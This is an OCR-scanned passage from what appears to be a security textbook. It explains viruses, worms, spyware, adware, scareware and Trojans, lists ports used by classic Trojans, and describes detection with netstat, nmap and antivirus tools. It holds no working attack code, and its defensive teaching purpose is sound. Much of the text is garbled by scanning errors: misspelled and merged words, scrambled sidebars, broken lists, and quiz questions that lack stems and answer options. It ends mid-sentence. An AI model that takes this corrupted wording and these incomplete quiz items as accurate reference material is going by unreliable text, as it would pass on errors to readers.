Please make sure you have backed up any local hard drive files adequately —
network, floppy, etc.

In both cases a simple search of Google or discussion with the IT department of a
company wilt reveal these to be hoaxes: however, in many cases the recipients of these
nu-ssnges panic and forward them on. causing furl Jut panic.

Prevention Techniques

Viruses have been in the computer and network business almost as long as the business
itself has been around. A wide variety of techniques and tools have evolved to deal with
the threat.

242

PART 2 A Technical Overview of Hacking

Education

Knowledge is half the battle. Getting system owners to understand how not to get
infected or spread viruses is a huge element in stopping the problem. Users should
be instructed on proper procedures to stop the spread of virus code. Such tips should
generally include:

• Don’t allow employees to bring media from home

and trusted sources

• Don’t allow workers to install software without permission
from the company IT department

■ Inform IT or security of strange system behaviors

• Ban flash drives

• Ban portable hard drives

Limit the use of administrative accounts

Antivirus

The next line of defense is the antivirus software that is designed to stop the spread and
activity of viruses. Antiviruses are designed to run in the background on a system, staying
vigilant for activity that suggests viruses and slopping or shutting it down. Antiviruses
are effective tools, but they can be so only if they are kept up to date. Antiviruses rely on
a database of signatures that lets them know what to look for and remove. Because new
viruses are released each day, if you neglect this database it becomes much more likely
a virus will get through.

Because there is a wide range of viruses and other malicious code, an antivirus must
be able to detect more than a simple virus. Good antivirus software can detect viruses,
worms, Trojans, phishing attacks, and, in some cases h spy ware.

Antiviruses tend to use one of two different methods. The first is the suspicious behavior
method. Antivirus programs use this to monitor the behavior of applications on a system.
This approach is widely used as it can detect suspicious behavior in existing programs,
as well as detecting suspicious behavior that indicates a new virus may be attempting

The second method is dictionary-based detection. This method will scan applications
and other files when I hey have Etc cess to your system, This advantage of this method is
that it can detect a virus almost immediately instead of letting it run and detecting the
behavior later, The downside is that the method can detect only viruses that it knows
about — if you neglect to update the software it cannot detect new viruses.

CHAPTER 10 Malware, Worms, and Viruses

243

Another detail that you cannot overlook is applying patches on
systems and softwEire when they become available. Vendors of
operating systems and applications such ns Microsoft regularly
release patches designed to close holes End address vulnerabilities
on systems that viruses could exploit. Missing a patch or update
can easily mean the difference between avoiding a problem

Worms and How They Function

NOTE

Microsoft is one of many
software vendors that have
patches. In Microsoft’s case
a monthly event known as
Patch Tuesday is specifically
security issues,

^NOTE

Worms can cause alterations
to or corruption of data
on a system t but can also
cause damage indirectly by
replicating at a rapid rate,
clogging networks with traffic
they cannot handle.

Worms are a different type of malware a I to gel her. Viruses
require user intervention for their infection to take place —
such as the opening of a file or the booting of a computer
In the case of worms, however, no user action is required,
A worm is a self-replicating piece of software thai combines the
convenience of computer networks wilh ihe power of malware.
Worms also differ from viruses in that viruses require a host
program to stay resident, A worm does not require this and
is actually self-contained. Worms also can cause substantially
more harm than a virus K which is typically limited to corrupting
data and applications.

An earlier chapter mentioned the earliest recognized worm,
known now as the Morris worm. This worm exhibited some of the
traits associated with modern-day worms, particularly the ability
to rapidly replicate. At the time the Morris worm was unleashed,
the Internet was small compared with today, but the effect was
no less devastating. The worm replicated so rapidly and so aggres-
sively thai networks were clogged with traffic and brought down.
Estimates a I the time placed the damage from the outbreak at
$10 million (not adjusted for inflation). One worm that caused widespread damage was the SQL Slammer or Slammer worm. The Slammer worm was responsible for widespread slowdowns and denials of service on the Internet, It was designed to exploit a known buffer overflow in Microsoft’s SQL Server and SQL Server Desktop Engine products, liven though Microsoft had released a software patch six months hefore the actual infection, many had neglected to install the patch, and therefore the vulnerability still existed on many systems. As a result, in the early morning hours of January 25, 2003 , the worm became active and in Jess than 10 minutes had infected 75,00(1 machines. MOTE The fallout from the Morris worm is still debated today, with damage estimates ranging up to$100 million and several
thousand computers or more
infected. While the numbers
can be argued, what cannot
be is the impact of the infection.
People realized that worms
posed a threat and that tougher
laws on cybercrime were needed.

244 PART 2 A Technical Overview of Hacking

How Worms Work

Worms are relatively simple in design and function, but very dangerous due to the speed
and effectiveness with which they spread. Most worms share certain characteristics,
which help define how they work and what they can do. The characteristics are as follows:

• Do not need a host program to function
• Do not require user intervention

• Replicate rapidly

• Consume bandwidth and resources

• Worms can also perform some other functions, including:

• Transmit information from a victim system
• Carry a payload such as a virus

• Examining these characteristics a bit more in detail will help you understand how a worm
w r orks and the challenges worms pose to a security professional. In fact, worms differ from
viruses in two key ways:

» A worm can be considered a special type of malware that can replicate and consume
memory, but not attach to other programs.

• A worm spreads through infected networks automatically, while a virus does not.

One of the main characteristics of worms Is that they do not need a host program
to function, unlike their fellow malware viruses. Worms are designed to function by
leveraging vulnerabilities on a target system that is generally unknown or unpatched.
Once a worm locates one of these vulnerabilities, it infects the system and then uses the
system to spread and infect other systems. A worm performs alt these functions by using
the system’s own processes to do its job, but does not require any host program to run
before starting the initial process.

Another characteristic that differentiates worms from other malware is their ability
to run without user intervention. Viruses, for example, require a host program to be
executed for the infection to begin: worms simply need the vulnerability to exist in order
for the process to take place. In the case of worms, just having a system turned on and

NOTE

connected to the Internet is enough to make it a target. Combine
this with the vulnerabilities and the danger is obvious.

The Slammer worm doubled
the number of infected
machines every 3,5 second
much faster than previous
worms. Slammer boasted
an infection rate that was
250 trmes as fast as Code Red,
years earlier.

Since Day 1, worms have possessed a feature that makes them
a dangerous force to deal with — their ability to replicate very

rapidly. One of the features of the Morris worm that even its creator

did not expect was that it replicated so rapidly that it choked up
networks and shut them down quite effectively. This feature has
been a characteristic of worms ever since. Worms can replicate
so quickly that their creators are frequently caught off guard.

This replication is made possible by a number of factors, including

J

poorly maintained systems, networked systems, and the number
of systems linked via the Internet,

CHAPTER 10 Malware, Worms, and Viruses

245

Light Side Versus Dark Side

Some worms have been created for benign purposes. One such family of worms is the
Nachi family. Nachi was designed to locate systems that had certain vulnerabilities not
patched by the system owner. It wo uld then download the appropriate patches to fix
the problem.

Such worms introduced several questions. Among them was, if a worm has benign
purposes in mind, is it OK? This question has compelling arguments on both sides.

NOTE

One of the earliest warning
signs of worms is the
unexplained slowdown of a
system even after repeated
reboots or other checks. While
not always a sign of a worm,
it is one of the red flags that
the system owner should
investigate.

Probably the most visible or dramatic feature of worms is
their consumption of resources, which shows up eis a side effect.
Mix into this equation of speed and replication the number of
computers on the In tern el, and you have a situation that teads
to bandwidth resources being consumed on a huge scale. Worms
such as Slammer caused massive slowdowns on the Internet due
to the scans it sent out looking for vulnerable systems and the way
resources on infected systems as it replicated off the system,
using system resources to do so.

In recent years some new characteristics have been added
to the behaviors of worms, one of which is the ability to carry
a pay load. While traditionally? worms have not directly damaged systems, worms thai
carry pay loads can do all sorts of mischief, One of the more creative uses of worms has
been to perform “crypto viral extortion. H The worm drops off a pay load that looks for
specific file types (such as .doc files) and encrypts them. Once this has taken place* the
worm leaves a message for the user offering to reveal the encryption key after the user
pays a certain amount of money.

Stopping Worms

At the core of the worm problem is operating systems that have
overlooked or un patched vulnerabilities. Vendors such as Microsoft
issues in their operating systems — including vulnerabilities that
worms could use to spread. The problem becomes one of knowing
patches are available for a system and applying them. This problem
becomes even bigger when you realize that worms aren’t restricted
just to corporate systems — they can also hit home users, who are
more likely to miss ptitches, In some cases, patches are not yet
released for a vulnerability. This leads to what is called a zero- day
exploit, in which a hole can be exploited immediately.

P NOTE

Several worms such as Code
Red, Nimda r Blaster, and
Slammer are still alive and well
on the Internet today, although
at levels well below their
initial outbreak. These worms,
some of which are nine years
old, still infect systems. The
main reason? System owners
that have neglected to patch
their systems, either out of
ignorance or laziness.

246 PART 2 A Technical Overview of Hacking

NOTE

The old saying “An ounce of
prevention is worth a pound
of cure” applies to virus and
worm prevention, as it is vastly
easier to stop the problem
before ft starts than to try to
remedy it after the fact.

The Power of Education

Much as with viruses, education is key to stopping worms. Worms
are frequently spread via e-mail applications by e-mails bearing the
name ILOVEYOU, for example. These prey on a user’s curiosity —
the user opens the e-mail and unknowingly runs the worm in the
background, Add in attacks such as phishing> which further pique
a user’s curiosity, and you have a problem that only education

Antivirus and Firewalls

One of the primary lines of defense against worms is reputable antivirus and anti-spy ware
applications, [laving an antivirus EipplkTillon on ;i system helps prevent u worm in lection
hut only if it is kept up to date. Modern and up-to-date antivirus applications can easily
stop most worms when they appear.

Another way to stop worms is the tire wall. The firewall is a valuable tool as it can block
the scans to and from a system that worms use both to spread the infection and to deliver
it from an infected system to other systems. Most modern operating systems such as
Microsoft’s Windows 7 include this feature as part of the core system.

Spy ware

Spy ware is software designed to collect and report information on a user’s activities
without the user’s knowledge or consent. Spy ware can collect any type of information
about the user that the author wishes to gather, such as:

• Browsing habits
• Keystrokes

• • Software usage

• General computer usage

Spy ware has been used to gather information for any reason that its author deems useful.
The information collected has been used to target ads. generate revenue for the author,
steal personal in formation, or steal data from an infected system. In some cases, spy ware
has gone beyond simple information collection to altering a system’s behavior to be more
along the lines of the author’s wishes. Additionally, spy ware has been known to act as a
precursor to further attacks or infection. It can be used to download and install software

CHAPTER 10 Malware, Worms, and Viruses

247

Methods of Infection

Spy wei re can be placed on a system by a number of different methods, each of which
is effective in its own way When the software is installed, it typically remains hidden
and proceeds to carry out its task. Delivery methods for spy ware include;

Peer-to- peer networks (P2P) — This delivery mechanism has become very popular
because of the increased number of individuals using these networks to obtain
free software.

Instant messaging (INI} — Delivering malicious software via IM is easy and because
IM software has never had much in the way of security controls.

Internet Relay Chat (IRC) — IRC is a commonly used mechanism to deliver messages
and software because of its widespread use and the ability to entice new users

• E-mail attachments — With the rise of e-mail as a communication medium,
the practice of using it to distribute malware has also risen.

Physical access — Once an attacker gains physical access, it becomes relatively easy
to install the spy ware and compromise the system.

• Browser defects — With many users forgetting or not choosing to update their
browsers as soon as updates are released, distribution of spy ware becomes easier.

can mean that you may have downloaded something nastier, such as spy ware.

One of the more common ways to install software on ei system is
through Web browsing. When a user visits a given Web site, the spyw T are
Spy ware installed in this manner is quite common as Web browsers lend
themselves to this process — they are frequently imp ate bed. do not have
upgrades Eip plied, or are incorrectly configured. In most cases users do
not use the most basic security precautions that come with a browser,
in some cases overriding them to get \ better browsing experience or
to see fewer popup s or prompts.

^ NOTE

In some articles and
publications, this
installation method is
referred to as drive-by

In Windows Vista one of the much-maligned features was known as the UAC or User
Account Control. One thing this feature was designed to prevent is software installing or
other activity happening without a user’s knowledge. Because some users hated the change
in behavior between Vista and Windows XP, they shut off this feature to stop the nag screen.
But this also disabled protection in Internet Explorer designed to offer more security including
against spyware.

248 PART 2 A Technical Overview of Hacking

FIGURE 10 1

Installation options.

J Cttearter v232 Setup

ferial Optf

V Arid ‘Rm-i CCfeaner ‘ optica to Rttyde Sn ncjrtte**
[A Add ‘Open GOearier . . , ‘ option to Recycle Br. context menu

[Vj Automalicaly dhedc for updates bo CCfeaner
[Ths nay not work if you have a firewat nstalled)

I ^ Add COeaner vahpo? Toolbar ane* uk COeaner froen /our browser

WWw.ptriform.i^Ofti

■tf flack

total

Can cet

Bundling with Software

Another common way to place software on a user’s system is via installation of other
software that the user intentionally installs. In these cases, a user downloads a legitimate
piece of so ft w tire from a Web site and then proceeds to install it During the In stall tit ion
process the user is prompted to Install additional software before proceeding. In most cases
u^lts believe that they can’t install Lhe so flu tire Lhey vvanl v,ilhuu1 accepting it. Or they
simply click the ” L Kext N button and don’ I pay attention. Other ways to get spy ware on a
system during installation are strategically placed checkboxes that install spy ware-type
Explications by default. Such a dialog is shown in Figure 10-1 .

You will frequently find adware in the same machines infected with spy ware. Adware
is software specifically designed to display ads your system in the form of popups or
nag screens. When this class of software is deployed with spy ware, the effect can be
quite dramatic, as you will be bombarded with ads specifically targeted to you and your
search habits.

In a number of situations, adware is installed on victims 1 systems because it + s been
bundled with software that they wish to install. In these situations, when adware is
installed it can monitor the usage of the software it was installed with or it can monitor
a wide range of other activities. When a piece of adware is installed on a system, the goals
can be very different from those of spy ware or other types of malware. In the early days

CHAPTER 10 Malware, Worms, and Viruses

249

FYl _J”l

It is not unheard of for versions of software in which developers have embedded adware to be
re- released by the pirate software community without the adware in place. One such example is
the file sharing software Kazaa. Kazaa had a version that included spyware/adware in it as part
of the normal free installation. However, this software was cracked and released without the
adware in place. Of course, this raises the question: What did the pirates include?

because developers wanted to make more money from their
software than they otherwise could. When such software is
installed, you will typically not notice until you are presented
with ads or other types of prompts.

In other cases h adware as not hidden from the user; it is much
more obvious. Some developers will offer different versions of
ihvlr soliw cm-, (nn- with ads mul one without. I ‘sers wishing
to get the software free must tolerate the annoyance of ads.
Users wishing to avoid ads must pay for the privilege.

Scareware

NOTE

It is common for developers
of so-called freeware to include
adware as part of their product.
In fact, some well-known
bundles other software with
it, such as browsers or other
products. Most manufacturers of
this type of software justify their
actions as a way to provide the
software free or at low cost.

Scareware is a type of ma I ware designed to trick victims into

Scareware generates authentic looking popups and other ads on a system to make
users think something bad has happened or will happen. For example, a common tactic
is to display a popup on-screen that appears to initiate a virus scan. It inevitably locates
a “virus” and then presents you with an offer to purchase software that removes it.
In most cases this software is worthless or actually installs
something else that performs other nasty actions, such as those
connected to spyware. Users who fall for this scam typically
tlnd themselves at ibe very least out some amount of money —
not to mention that whatever they installed may have damaged
their system.

What makes this software even worse is that it frequently
employs techniques that outright frighten system users. In
addition to generating large numbers of bogus error messages,
this class of malwarc may also generate real-looking dialogs
such as those seen in Windows, When you click on these
“ujj i h 1 1 j elcse i hem . liu-;. may actually be installing
the software,

NOTE

This type of software has become
more common over the last few
years as users have become more
savvy, and malware authors
have had to change their tactics.
Enticing users to click on realistic
dialogs and presenting real-
looking error messages can be
powerful ways to place illicit
software on a user’s system.

250 PART 2 A Technical Overview of Hacking

When executed, some scare ware will go one step further, even weakening existing
system security. Sea re ware has been known to install on a system and specifically hunt
down and disable protective software such as firewalls and antiviruses. Even worse, some
of this software will even prevent updates from the system vendor, meaning that security
holes and defects may no longer be fixed,

Removing scareware can be a daunting task, because it disables legitimate software
that protects the system. In some cases, the system may be so compromised that all
Internet activity and other update systems may error out, preventing you from making
any changes.

Current tactics have evolved even further to include extortion. Recent tactics have
included installing software on a system that hunts for certain file types (i.e.. Word
documents) that it encrypts. It then offers to decrypt them only if the user pays up.

_f v .

fljft CHAPTER SUMMARY

Ma I ware has in creased in power and aggressiveness over the past few years to the point
where a security professional cannot overlook or ignore the threat. Malware lias taken
many forms and has moved from being a simpJe annoyance to being criminal mischief.
Software in this category has evolved dramatically to the point of being extremely
malicious. MaJware can now steal passwords, personal information, and plenty of
other information from an unsuspecting user.

The modern concept of malware lirst came into being in the l L )80s and 1990s. Terms
such as viruses, worms, adware, scareware, and spy ware have become more common
in popular usage. In the past, malware was just annoying. But is has become easier
to spread because of [he convenient distribution channel the Internet offers, as w r ell as
the increasingly clever social engineering methods the creators of this type of software
employ. Making the problem of malware even worse is the complexity of modern
software, frequent lack of security, known vulnerabilities, and the lax altitude many
users have toward applying security updates and patches.

New types of malware have included increasingly common scareware. Software in this
category is designed to scare you into installing the package. When you do, it takes over
the system and disables protective mechanisms or other items.

CHAPTER 10 Malware, Worms, and Viruses

KEY CONCEPTS AND TERMS

Boot se cto r Sea re wa re

(EULA)

CHAPTER 10 ASSESSMENT

1. Viruses do not require a host program.

A, True

B, False

Z. Worms, are designed to replicate repeatedly.

A. True

B. False

1. is designed to intimidate users.

B, Viruses

C Scareware
D, Worms

1. Which is used to intercept user information/

B, Scareware
C Spy ware
D, Viruses

1. Is known to disable protective

mechanisms on a system such as antiviruses,
antlspyware, and firewalls, and to report

on a user’s activities.

B. Scareware
C Spyware
D, A virus

1. Which of the following is a characteristic

A, Gathering information

B, Displaying popups
C intimidating users
II Replicating

251

1. Prevention of viruses and malware Includes

A. Popup blockers

B. Antivirus

C. Buffer overflows
LX All of the almve

1. is a powerful preventative measure

to stopping viruses,

1. Which of the following can limit the impact
of worms?

A. Antiviruses, firewalls, patches

B. Anti-spy ware, firewalls, patches

C. And- worm ware, firewalls, patches
11 Anti-malware

1. attaeh(es) to files.

A. Viruses

B. Worms

Jl Spywarc

1 1 . Multipartite viruses come In encrypted form.

A. True

B. False

1 2. rceord{s) a user’s typing.

A. Spy ware

B. Virsues

D. Malware

U. are configured to go off at a certain

date, time, or when a specific event occurs.

1. Scareware Is harmless.

A. True
li. False

Trojans and Backdoors

ONE OF THE OLDEST and most commonly misunderstood forms of malware
is the Trojan horse or Trojan. Trojans are pieces of software that are
designed to give an attacker covert access to a victim’s system. A Trojan
is designed to be slipped onto a system quickly and stealthily to start whatever
action it is meant to perform. Trojans are small and compact. This makes them
one of the hardest types of software to detect on a system.

Trojan horses have a long history in the field of computer security. Since
they first came into existence, they have represented one of the chief threats
and dangers to users, as they can appear very attractive, enticing them to click
on and install software that grants someone else full control of their systems.
Such programs operate effectively once they have been installed, as they use
existing communication methods such as ports to transfer their information
between systems using overt channels to carry information in covert channels.

A Trojan can be defined as a program that carries something of hidden intent.
Because of their ability to hide from detection, Trojans represent one of the leading
threats to their targets 1 systems. Trojans have been hidden in a diverse group of
software packages, including games, chat software, e-mail, Flash movies, and other
types of software. When a program is said to be “Trojaned,” it has been infected
or embedded with some function that is malicious in purpose,

When a Trojan is planted on a system successfully, the intent is usually to
open what is known as a backdoor Backdoors are openings on a system that
an attacker makes to bypass normal security measures on a system. With one
of these openings in place, attackers can gain undetected, unchecked access
to a system for any purpose they intend, which is typically some sort of remote
access. This lets attackers steal information, control a system remotely, upload
files, and even use one system to attack another system.

Included in the discussion of Trojans and backdoors are what are known
as covert and overt channels. These two channels represent a mechanism for
transferring information between systems and processes in ways that are supported

and unsupported, Overt channels represent the path that data and other information
are supposed to travel over by design. As such, the paths can be properly monitored
and controlled, Covert channels are said to be in effect whenever data and other
information are transferred over mechanisms not specifically designed to carry the
information in question. Covert channels represent a free ride for attackers, as their
activities over these paths may go completely undetected.

In this chapter we will discuss the various mechanisms that an attacker can
use to gain control of, maintain control of, and transfer information to and from
a victim system.

f

Chapter 11 Topics

This chapter covers the following topics and concepts:

• What the significance of Trojans is
What detection of Trojans and viruses is
What tools for Trojans are

What distribution methods are
What Trojan construction kits are

• What backdoors are
• What covert communication is

• What software protection is

• Chapter 11 Goals

When you complete this chapter, you will be able to:

• List common behaviors of Trojans
• List the goals of Trojans

• List the ways of detecting Trojans

• List the tools for creating Trojans
• Explain the significance of covert channels
■ List the tools for removing Trojans

• List the types of Trojans

• List software protection mechanisms for Trojans

• Explain the purposes of backdoors

• 254 PA RT 2 A Tech n i ea I Overview of H atk i n g

Significance of Trojans

Trojans are one of the oldest mechanisms used to compromise a computer system and
are still one of the more effective methods of doing so. When planned and implemented
correctly, a Trojan can yrani access to a system on behalf of the attacker, allowing all
sorts of activities to take place.

Software in the Trojan category represents oneofthe biggest dangers to the end user
or owner of a system. Users can be easily coerced into installing or running software that
looks legitimate but hides a pEiyload that does something unwanted, such as opening up
avenues that an attacker can use. Further complicating things is the fact that Trojans
operate on a principle that can be summed upas “permitting what you cannot deny”;
in other words, using ports and mechanisms on the system that you have to leave open
for the system to function normally such as ports 80 and 21 . These programs can even
redirect traffic in w T ays that they use ports that are open in place of ones that the attacker
does not wish to use.

The list of pieces of software that can be Trojaned is endless. It includes anything
that the creator believes will entice the victim to open the software. Applications such
as games, chat software, media players, screen savers, and other similar types have been
Trojaned. For example, an attacker may choose a popular downloadable game as a
By choosing a popular piece of software thai people will willingly download, the attacker
increases the chances of higher infection rates.

An Unknowing Victim?

The following is an excerpt of a story that was originally published on zdnet.co.uk.

“Julian Green r 45, was taken into custody last October after police with a search warrant
raided his house. He then spent a night in a police cell r nine days in Exeter prison and three
months in a bail hostel. During this time, his ex- wife won custody of his seven-year-old
daughter and possession of his house.

This is thought to be the second case in the UK where a J ‘ Trojan defense” has been used
to clear someone of such an accusation, tn April, a man from Reading was found not
guilty of the crime after experts testified that a Trojan could have been responsible for
the presence of 14 child porn images on his PC.

Trojan horses can be used to install a backdoor on a PC, allowing an attacker to freely
access the computer. Using the backdoor, a malicious user can send pictures or other files
to the victim’s computer or use the infected machine to access illegal Web sites, while
hiding the intruder’s identity. Infected machines can be used for storing files without the
knowledge of the computer’s owner.”

CHAPTER 11 Trojans and Backdoors

Trojans get their name “from the large wooden horse of Greek mythology that appeared at
the gates of the city of Troy. Thinking it was a gift, the Trojans brought the horse into the city
But it only looked like a gift. Little did the T r ojans know that inside the horse was hidden a small
detail of warriors who emerged at night and started the battle that destroyed the city. This story
explains the same concept that gave the Trojan form of malware its name.

A hacker may hai r e several goals in mind when creating ei Trojan, but typically it is
to maintain access for later usage. For example, an attacker may compromise a system
and install a Trojan that will leave a backdoor on the system.

Types of Trojans include:

• Remote access — Remote access Trojans (RAT) are designed to give an attacker
control over a victim’s system. Two well-known members of this class are the
SubS even program and its cousin Back Orifice. Typically members of this class
work in two components: a clien t and a server.

• Data sending — Trojans of this type are designed to capture and redirect data to
an attacker. The types of data these Trojans can capture are varied but can include
anything from keystrokes and passwords to any other type of information that may
be generated or reside on the system. This information can be redirected to a hidden
file or even e-mail if there is a predefined e-mail account.

• Destructive — Software in this category is designed to do one thing and one iJimy

only: destroy data and kill a system.

Denial of service (DoS) — Software in this category is designed to target a specific
service or system, overwhelm it and shut il down.

• Proxy — Trojans that lit into this category allow attackers to use a victim’s system
to perform their own activities. Using a victim’s system to carry out a crime makes
Locating the actual perpetrator much more difficult.

• FTP — Software in this category is designed to set up the infected system as an FTP
server. An infected system will become a server hosting all sorts of data including
illegal software, pirated movies and music or, as has been observed in some cases,
pornography.

• Security software d isablers — Trojans of this type are designed to specifically target
the security countermeasures present on a system and shut them down. On a system
infected with this software, mechanisms such as antivirus, firewall, and system
updates are often disabled. Trojans often use this strategy first to infect a system

and then perform activities from one of the other categories, such as setting up
a proxy server or FTP site.

256 PART 2 A Technical Overview of Hacking

One Use of a Trojan

The following story appeared in 2002 and shows how a Trojan can be used, in this case
by law enforcement, for legitimate reasons,.

“Feds Out- Hack Russian Hackers”

With the help of some new computer spying software, FBI agents were able to out-hack
a pair of Russian hackers who had stolen thousands of credit card numbers to make
purchases on Ebay and then defraud Pay Pal, the leading online bill payer.

The challenge, said Assistant U.S. Attorney Floyd Short, was that the suspects, Alexei
Ivanov and Vasily Gorshkov, were Russians. And their server — where Short says they kept
thousands of stolen credit card numbers — was also in Russia.

The game — which was successful — was for authorities in Seattle, Wash., to steal the
passwords and codes to the Russians’ server in Russia.

“Gorshkov went on the Internet,” said Floyd. “We obtained the name of the server
in Russia, his user name and his password…. It was critical to the case.”

How exactly did the FBI record an encrypted password and codes? It was with a $100 piece of software invented by Richard Eaton of Ken ne wick, Wash. Eaton’s program, WinWhat Where Investigator, has revolutionized computer snooping with what’s called keystroke logging. The software secretly records everything a user types, coded or not, and sends a report to a third party who is spying on the user. “The Russians just sat down and entered their passwords. It couldn’t have been any better than that,” said Eaton.. . Computer Trojans emerged in the mid-1980s as a way to infect software and distribute the infected pay load to different systems without raising suspicion, in most situations, but not all, Trojans are intended to ailow an attacker to remotely access or control a victim’s system. In the event an application that is infected with a Trojan is installed on a target system, the attacker can not only obtain remote access, but also perform other operations designed to gain control of the infected system. In fact the operations that an attacker can perform are limited by only two factors: the privileges of the user account it is running under and the design the author has chosen to implement. By infecting a system with a Trojan, an attacker opens up a backdoor to the system that he or she can take advantage of. Methods to Get Trojans onto a System Hackers have a range of options, from high-tech to low. for getting Trojans onto their victims’ computers. A common theme among these methods is that they play on the human desire to get something for nothing. Here are the common methods for installing a Trojan: CHAPTER 11 Trojans and Backdoors Peer-to-peer networks (P2P) — This delivery mechanism has become very popular due to the increased number of individuals using these networks to obtain software free of charge. An attacker can easily grab a legitimate piece of software, embed a Trojan in it, and post it on file sharing and wait for victims to download it. Instant messaging (IM) Delivering malicious software via l! has been very common an it is easy and IM software has never had much in the way of security controls. • Internet Relay Chat (IRQ — IRC is a mechanism commonly used to deliver messages and software due to its widespread use and its ability to entice new users to download software. E-mail attachments — With the rise of e-mail as a communication medium, the practice of using it to distribute Trojans also rose. Trojans have been distributed in this medium as attachments and as clickable links, • Physical access — Decidedly low tech but no less effective is physical access to a system. Once an attacker trains physical access, it becomes relatively easy to install the Trojan and compromise the system. • Browser defects — With many users forgetting to or choosing not to update their browsers as soon as updates are released, distribution of Trojans becomes easier. Since Web browsers are designed by their very nature to treat content that they are sent as trusted , this allows malicious programs to run unabated, • Freeware — You don’t get something for nothing and thinking you are getting free software can lead to disaster. Downloading software for no charge from unknown or un trusted sources can mean that you may have downloaded something naslier. such as a Trojan infested application, • Operations that could be performed by a hacker on a target computer system include: ■ Data theft • Installation of software • Downloading or uploading of files • Modification of files • Installing key loggers • Viewing the system user’s screen Consuming computer storage space • Crashing the victim’s system • Trojans are commonly grouped into the category as viruses, but th is is not entirely correct. Trojans are similar in certain ways to viruses in that they attach to other files which they use as a carrier, but they are different in the fact that they are not designed to replicate. The method of distribution that is used for Trojans is simple in that they attach themselves to another file and the file is retrieved and executed by an unsuspecting victim, Once this event occurs, the Trojan typically grants access to the attacker or can do some other action on the attacker’s behalf. 258 PART 2 A Technics I Overview of Hacking Trojans require instructions from the hacker to fully realize their purpose before or after distribution. In fact is has been shown in the majority of cases that Trojans are not actually distributed past the initial stages by their creators. Once attackers release their code into the world H they switch their involvement from the distribution to the listening phase, where Trojans will call home, indicating they have infected a system and may be awaiting instructions. Targets of Trojans The more we all use the Internet to communicate, shop, and even store our stuff, the more we generate targets for hackers and their Trojan horses. Here are some of the targets that tempt hackers: • Credit card data — Credit card data and personal information is a tempting and all too common target I.’pon obtaining this information an attacker can embark on a shopping spree purchasing any type of product or service they desire, such as YVeh services, games or other produeis. Passwords — Passwords are always an attractive target for attackers. If they obtain this sort of information, it can prove devastating to the victim. Since most individuals will reuse passwords over and over again, getting one password from an individual can easily open many doors. And usme, a Trojan Lo oh lain passwords can mean that a hacker can read passwords from a system that includes everything from e-mail and Internet accounts to banking passwords, Insider Information Coniidential or insider information is another target for an attacker. An attacker may very well use a Trojan to gain information from an organization that may not otherwise be public. • Data storage — In some cases a system that becomes the unlucky recipient of a Trojan may lind itself a point for storing data without their knowledge. I’ploading data to an infected system can turn that system into a server that can host any type of content Infected hosts have been known to include illegal music or movies, pirated software, pornography, linancial data, or even child pornography. • Random acts of mischief — In some cases the intention may just want to irritate or annoy the system ow r ner. The hacker may have simply want to have some fun at the victim’s expense. ^ NOTE Trojans rely on the fact that they look tike something the user wants, such as a game or prece of free software. When users install or run this software they run the main program, but unbeknown to them, the Trojan is running in the background. The first widespread Trojans to appear debuted between 1994 and 1998 as distribution methods became more robust (think Internet). Prior to this point the software was distributed via bulletin board systems iRISSsl floppies, and similar of methods, Since the early days of Trojans the sophistication of the software has increased, as has the number of reported incidents associated with this type of code. Of course as Trojans increased in sophistication, so did the methods used to thwart them, such as antivirus software and other lools. CHAPTER 11 Trojans and Backdoors Known Symptoms of an infection So what are the symptoms or effects of an infection of a Trojan? In the event that your ei nti virus does not detect and eliminate this type of software, it helps to be able to identify some of the signs of ei Trojan infection: • The CD drawer of a computer opens and closes. • The computer screen changes, as by Nipping or inverting. • Screen settings change by themselves. • Documents print with no explanation^ • The browser is redirected to ei strange or unknown Web page. • Windows color settings change. • Screens ave r se t tin gs ch a n ge. • Right and left mouse buttons reverse their functions. • The mouse pointer disappears. » The mouse pointer moves in unexplained ways. • The start button disappears. • Chat boxes appear on the infected system. • The Internet Service Provider (ISPS reports that the victim’s computer is running port scans. • People chatting appear to know detailed personal information. • The system shuts down by itself. • The task bard isa ppe ar s . ■ The account passwords are changed. • Legitimate accounts are accessed without authorization. • Unknown purchase statements appear in credit card bills. • Modems dial and connect to the Internet by themselves. • Ctrl+Alt+Del stops working. • While the computer is rebooted, a message stales that there are other users still connected. Detection of Trojans and Viruses There are several methods of detecting if a Trojan is present on a system , but few prove more useful to the security professional than looking at ports h so let’s go back to a topic that was discussed in a previous chapter. If Trojans are going to give an attacker the ability to attach to a system remotely, they are going to need to attach to the system through the use of a port. Some Trojans use well known ports that can be easily detected; others may use nonstandard or obscure ports that will need a tittle extra investigation to determine what is listening (whether it is a legitimate service or something else). Table 11-1 lists some of the common ports that are used for some classic Trojans. 260 PA RT 2 A Tech n i ea I Overview of H ack i n g table 11-1 S ome classic Troja ns and the ports and pn )tocols they use. TROJAN ill v#jn.i n PROTOCOL PORTS Back Orifice UOP 31337 or 31338 Back Orifice 2000 TCP/UDP 54320/54321 Beast TCP 6666 Citrix ICA TCP/UDP 1494 Deep Throat UDP 2140 and 3150 Desktop Control UDP MA Donald Dick TCP TCP 23476/23477 Loki ICMP (Internet Control IVIessaqe Protocol) NA NetBus TCP 12345 and 12346 Netcat TCP/UDP Anv Met meeting Remote TCP 4960B/49609 pcAnywhere TCP 5631/5632/65301 Reachout TCP 43188 Remotelv Anvwhere TCP 2000/2001 Remote TCP/UDP 135-1139 Whack-a-mole TCP 12361 and 12362 NetBus 2 Pro TCP 20034 Girl Friend TCP 21^44 Masters Paradise TCP 3129, 40421 r 40422, 40423 and 40426 Timbuktu TCP/UDP 407 VNC TCP/UDP 5800/5801 CHAPTER 11 Trojans and Backdoors Results of the netstat command. Of the tools for detecting Trojans* one of the easiest to access would be the command line tool known as netstat. Using netstat it is possible to list the ports that are listening on a system and browse each to see what is supposed to be running on each. In Windows at the command line you can type the following command: netstat -an This command will display the results shown in Figure 11-1. Another tool that could help you locate the ports that a Trojan is listening for instruc- tions on is nniap, With nmap you can scan ei system tind get a report back on the ports that are listening and investigate further to see if any unusual activity is afoot. Vulnerability Scanners Providing an additional tool is the use of a category of software known as the vulnerability scanner. Software of this type can be used to scan a system, locate, and report back on services such as Trojans listening on the ports of a system. One of the h est known scanners of this type is the tool known as Nessus. One of the best and most reliable methods of detecting Trojans, viruses, and worms is the use of the ubiquitous antivirus software. Software of this type is used to scan for the behaviors and signatures of these types of code and in turn remove and/ or quarantine them on the system. Antivirus 262 PART 2 A Technics I Overview of Hacking Trojan Tools There exist a wide range of tools used to take control of a victim’s system and leave behind a -l present” for I hem in the farm of a backdoor. We will not tit tempt to cover all these tools, but for reference the following list includes some of the more common ones that have been found in the wild. Note that this 